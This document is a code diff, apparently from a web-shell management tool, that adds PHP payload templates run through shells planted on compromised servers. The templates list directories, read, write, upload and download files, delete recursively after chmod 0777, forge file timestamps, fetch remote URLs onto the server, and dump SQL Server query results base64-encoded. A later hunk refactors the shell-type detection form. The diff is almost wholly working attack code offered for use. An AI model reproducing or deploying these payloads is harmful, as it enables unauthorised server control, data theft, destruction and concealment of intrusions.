+          foreach($fm as $rs){
+            echo($rs['Name']."\\t|\\t");
+            $i++;
+          }
+          echo("\\r\\n");
+          while($rs=@sqlsrv_fetch_array($q,SQLSRV_FETCH_NUMERIC)){
+            for($c=0;$c<$i;$c++){
+              echo(base64_encode(trim($rs[$c])));
+              echo("\\t|\\t");
+            }
+            echo("\\r\\n");
+          }
+        }
+        @sqlsrv_free_stmt($q);
+      }else{
+        echo("Status\\t|\\t\\r\\n");
+        if(($e = sqlsrv_errors()) != null){
+          foreach($e as $v){
+            echo(base64_encode($e['message'])."\\t|\\t\\r\\n");
+          }
+        }else{
+          echo("RmFsc2U="."\\t|\\t\\r\\n");
+        }
+      }
+      @sqlsrv_close($T);`.replace(/\n\s+/g, ''),
+  }
+})
\ No newline at end of file

source/core/phpraw/template/filemanager.js

+/**
+ * 文件管理模板
+ */
+
+module.exports = (arg1, arg2, arg3) => ({
+  dir: {
+    _: `$D=base64_decode(substr("#{newbase64::path}",#randomPrefix#));$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\\t".$T."\\t".@filesize($P)."\\t".$E."\\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);}`,
+  },
+
+  delete: {
+    _: `function df($p){$m=@dir($p);while(@$f=$m->read()){$pf=$p."/".$f;if((is_dir($pf))&&($f!=".")&&($f!="..")){@chmod($pf,0777);df($pf);}if(is_file($pf)){@chmod($pf,0777);@unlink($pf);}}$m->close();@chmod($p,0777);return @rmdir($p);}$F=base64_decode(substr("#{newbase64::path}",#randomPrefix#));if(is_dir($F))echo(df($F));else{echo(file_exists($F)?@unlink($F)?"1":"0":"0");}`,
+  },
+
+  create_file: {
+    _: `echo @fwrite(fopen(base64_decode(substr("#{newbase64::path}",#randomPrefix#)),"w"),base64_decode(substr("#{newbase64::content}",#randomPrefix#)))?"1":"0";`,
+  },
+
+  read_file: {
+    _: `$F=base64_decode(substr("#{newbase64::path}",#randomPrefix#));$P=@fopen($F,"r");echo(@fread($P,filesize($F)?filesize($F):4096));@fclose($P);`,
+  },
+
+  copy: {
+    _: `$m=get_magic_quotes_gpc();$fc=base64_decode(substr("#{newbase64::path}",#randomPrefix#));$fp=base64_decode(substr("#{newbase64::target}",#randomPrefix#));function xcopy($src,$dest){if(is_file($src)){if(!copy($src,$dest))return false;else return true;}$m=@dir($src);if(!is_dir($dest))if(!@mkdir($dest))return false;while($f=$m->read()){$isrc=$src.chr(47).$f;$idest=$dest.chr(47).$f;if((is_dir($isrc))&&($f!=chr(46))&&($f!=chr(46).chr(46))){if(!xcopy($isrc,$idest))return false;}else if(is_file($isrc)){if(!copy($isrc,$idest))return false;}}return true;}echo(xcopy($fc,$fp)?"1":"0");`,
+  },
+
+  download_file: {
+    _: `$F=base64_decode(substr("#{newbase64::path}",#randomPrefix#));$fp=@fopen($F,"r");if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo("ERROR:// Can Not Read");}`,
+  },
+
+  upload_file: {
+    _: `$f=base64_decode(substr("#{newbase64::path}",#randomPrefix#));
+    $c="#{buffer::content}";
+    $c=str_replace("\\r","",$c);
+    $c=str_replace("\\n","",$c);
+    $buf="";
+    for($i=0;$i<strlen($c);$i+=2)
+      $buf.=urldecode("%".substr($c,$i,2));
+    echo(@fwrite(fopen($f,"a"),$buf)?"1":"0");`.replace(/\n\s+/g, ''),
+  },
+
+  rename: {
+    _: `
+    $src=base64_decode(substr("#{newbase64::path}",#randomPrefix#));
+    $dst=base64_decode(substr("#{newbase64::name}",#randomPrefix#));
+    echo(rename($src,$dst)?"1":"0");`.replace(/\n\s+/g, ''),
+  },
+
+  retime: {
+    _: `
+    $FN=base64_decode(substr("#{newbase64::path}",#randomPrefix#));
+    $TM=strtotime(base64_decode(substr("#{newbase64::time}", #randomPrefix#)));
+    if(file_exists($FN)){
+      echo(@touch($FN,$TM,$TM)?"1":"0");
+    }else{
+      echo("0");
+    };`.replace(/\n\s+/g, ''),
+  },
+
+  chmod: {
+    _: `
+    $FN=base64_decode(substr("#{newbase64::path}",#randomPrefix#));
+    $mode=base64_decode(substr("#{newbase64::mode}",#randomPrefix#));
+    echo(chmod($FN,octdec($mode))?"1":"0");`.replace(/\n\s+/g, ''),
+  },
+
+  mkdir: {
+    _: `$f=base64_decode(substr("#{newbase64::path}",#randomPrefix#));echo(mkdir($f)?"1":"0");`,
+  },
+
+  wget: {
+    _: `$fR=base64_decode(substr("#{newbase64::url}",#randomPrefix#));
+    $fL=base64_decode(substr("#{newbase64::path}",#randomPrefix#));
+    $F=@fopen($fR,chr(114));
+    $L=@fopen($fL,chr(119));
+    if($F && $L){
+      while(!feof($F))
+        @fwrite($L,@fgetc($F));
+      @fclose($F);
+      @fclose($L);
+      echo("1");
+    }else{
+      echo("0");
+    };`.replace(/\n\s+/g, ''),
+  }
+})
\ No newline at end of file

source/modules/shellmanager/list/form.js

@@ -268,22 +268,19 @@ class Form {
           "aspx": /.+\.as(px|mx)/,
           "asp": /.+\.(as(p|a|hx)|c(dx|er))/,
           "jsp": /.+\.(jsp[x]?)/,
-          "jsp": /.+\.(jsp[x]?)/,
           "custom": /.+\.((jsp[x]?)|cgi)/
         }
         let typecombo = form.getCombo('type');
-        if (file_match.php.test(id) == true) {
-          typecombo.selectOption(typecombo.getOption('php').index);
-        } else if (file_match.aspx.test(id) == true) {
-          typecombo.selectOption(typecombo.getOption('aspx').index);
-        } else if (file_match.asp.test(id) == true) {
-          typecombo.selectOption(typecombo.getOption('asp').index);
-        } else if (file_match.jsp.test(id) == true) {
-          typecombo.selectOption(typecombo.getOption('jsp').index);
-        } else if (file_match.jsp.test(id) == true) {
-          typecombo.selectOption(typecombo.getOption('jspjs').index);
-        } else if (file_match.custom.test(id) == true) {
-          typecombo.selectOption(typecombo.getOption('custom').index);
+        let lasttype = typecombo.getSelected();
+        for (const key in file_match) {
+          if(file_match[key].test(id) == true) {
+            // phpraw jspjs 时不改变类型
+            if(lasttype.indexOf(key)>-1){
+              break;
+            }
+            typecombo.selectOption(typecombo.getOption(key).index);
+            break;
+          }
         }
       }